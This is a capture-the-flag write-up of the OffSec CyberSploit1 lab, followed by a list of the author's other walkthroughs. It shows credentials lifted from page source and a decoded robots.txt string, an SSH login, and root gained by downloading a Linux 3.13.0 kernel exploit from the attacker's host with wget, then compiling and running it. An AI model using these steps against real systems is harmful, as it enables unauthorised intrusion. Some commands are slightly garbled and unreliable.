CyberSploit1 | OffSec Writeup

CyberSploit1 | OffSec Writeup


Cybersploit-1 is a popular lab from Offensive Security (OffSec) designed to help users improve their penetration testing skills. This lab typically involves various stages of penetration testing, including information gathering, vulnerability analysis, exploitation, and post-exploitation.

Use Rustscan scripts or other tools to gather more information about the services running on open ports:

After finding the webpage, I went to the website directly:

I checked the source code.I found the username while reviewing the source code.Username:itsskv

I tried gobuster and found the hidden directory.

/Robots.txt

I found the password hash here: Y3liZXJzcGxvaXR7eW91dHViZS5jb20vYy9jeWJlcnNwbG9pdH0=


Hash cracked by cyberchef .CyberChef (gchq.github.io)

So Username : itsskv & Password : cybersploit{youtube.com/c/cybersploit}

Lets connect to SSH with the command ssh itsskv@ 192.168.169.92




1st Flag


ROOT


"Now, let's find a way to gain root access. To do this, we need to identify a vulnerability in the machine. We'll start by checking the Linux Kernel version using the command uname -a, which reveals that the machine is running Linux version 3.13.0.


searchsploit Linux 3.13.0

Downloads from Exploit DB.


o now we know the vulnerability so next we need to download the exploit file for this vulnerability from Exploit-DB so that we can gain root access .Downloads local machine and transfer file lab machine.

Run Command 
python -m http.server 80        

lab machine run this command: Here use your vpn ip {tun0} and file name

wget https://192.168.45.211:80/ofs.c        

Then run this command: Here your file name

first: gcc ofs.c -o ofs
second: ./ofs        


Now you got the root.

cd /root        
cat proof.txt        



Happy Hacking:



要查看或添加评论,请登录

Santosh Kumar的更多文章

  • Offensive Security So_Simple CTF Walkthrough

    Offensive Security So_Simple CTF Walkthrough

    Vrijanandan Kumar SANTOSH KUSHWAHA We scan the site with nmap. This shows two open port.

    1 条评论
  • Different CTF from TryHackMe

    Different CTF from TryHackMe

    A Hard THM Challenge. Steganography, Database Handling, FTP, WordPress CMS, and Brute-Forcing.

  • Shakabrah Walkthrough OffSec

    Shakabrah Walkthrough OffSec

    In this walkthrough, I'll take you through the steps to tackle the "Shakabrah" box from OffSec. This concise guide…

    1 条评论
  • TryHackMe- Kenobi-Walkthrough

    TryHackMe- Kenobi-Walkthrough

    SANTOSH KUSHWAHA Vrijanandan Kumar The "Kenobi" room on TryHackMe is an engaging challenge that guides you through the…

  • Wonderland -TryHackme Walkthrough

    Wonderland -TryHackme Walkthrough

    /SANTOSH KUSHWAHA Wonderland CTF link: TryHackMe | Wonderland The Wonderland challenge on TryHackMe is a cybersecurity…

  • Library - TryHackMe Walkthrough

    Library - TryHackMe Walkthrough

    Scan the machine:' We first find the list of services that are running on the machine. We use the below Rustscan…

  • Vulnversity — Walkthrough Tryhackme

    Vulnversity — Walkthrough Tryhackme

    Introduction "Vulnversity" is an introductory level room on TryHackMe that covers various penetration testing…

  • Poster TryHacMe Walkthrough

    Poster TryHacMe Walkthrough

    SANTOSH KUSHWAHA The "Poster" room focuses on web application security, specifically SQL injection, directory…

    1 条评论
  • Seppuku offsec Walkthrough

    Seppuku offsec Walkthrough

    SANTOSH KUMAR The Seppuku Offsec lab is a virtual penetration testing environment available on Vulnhub, designed to…

  • TryHackMe- Mr. Robot Walkthrough

    TryHackMe- Mr. Robot Walkthrough

    This Room Linux Basic: TryHackMe | Mr Robot CTF Reconnaissance I started by scanning the ports with Rustscan. We…

社区洞察